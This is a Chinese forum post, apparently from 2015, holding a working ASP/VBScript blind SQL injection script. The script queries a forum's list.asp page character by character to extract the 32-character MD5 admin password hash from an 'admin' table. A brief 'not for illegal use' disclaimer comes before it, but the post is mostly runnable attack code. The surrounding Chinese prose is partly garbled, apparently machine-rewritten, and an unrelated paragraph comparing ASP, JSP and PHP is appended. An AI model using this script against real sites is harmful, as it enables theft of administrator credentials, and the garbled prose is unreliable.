|
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
缺点:安全性不是太差了,还行,只要你充分利用系统自带的工具;唯一缺点就是执行效率慢,如何进行网站优化以后,效果会比较好。请勿用于不法用处,本代码只是为了让宽大ASP喜好者分明道理,提防于已然。
Functionbytes2BSTR(vIn)
dimstrReturn
dimi,ThisCharCode,NextCharCode
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,i,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction
functiongetHTTPPage(url)
dimhttp
sethttp=createobject("MSXML2.XMLHTTP")
Http.open"GET",url,false
Http.send()
ifHttp.readystate4then
exitfunction
endif
getHTTPPage=bytes2BSTR(Http.responseBody)
sethttp=nothing
iferr.number0thenerr.Clear
endfunction
FunctionRegExpTest(patrn,strng)
DimregEx,retVal创建变量。
SetregEx=NewRegExp创建正则表达式。
regEx.Pattern=patrn设置形式。
regEx.IgnoreCase=False设置是不是辨别巨细写。
RegExpTest=regEx.Test(strng)实行搜刮测试。
EndFunction
password=""
keyword="论坛首页"前往准确页面会呈现的字符串
url1="http://qq/bbs/list.asp?boardid=7"SQL注进出口
passlen=32MD5暗码一般是32位
dimpass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)暗码值一般是0-9,a-f
server.ScriptTimeout=999
fori=1topasslen
flag=false
url=url1&"and(selectasc(mid(password,"&i&",1))fromadminwhereid>0)="机关的SQL语句这里才是关头
forj=0toubound(pass)
str=getHTTPPage(url&pass(j))
flag=RegExpTest(keyword,str)
ifflag=truethen
password=password&chr(pass(j))
exitfor
endif
next
next
response.Write(password)
</p>asp,jsp,php是web开发的三大技术,asp简单易用且有microsoft做靠山,jsp功能强大是因为有java支持,php则开源跨平台.在国内,asp应用范围最广,jsp发展势头最猛,php则处于劣势.这可能与公司的支持以及技术的培训有关. |
|
|Archiver|手机版|仓酷云
鄂ICP备14007578号-2
发表于 2015-1-16 23:09:29
收藏
转播
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜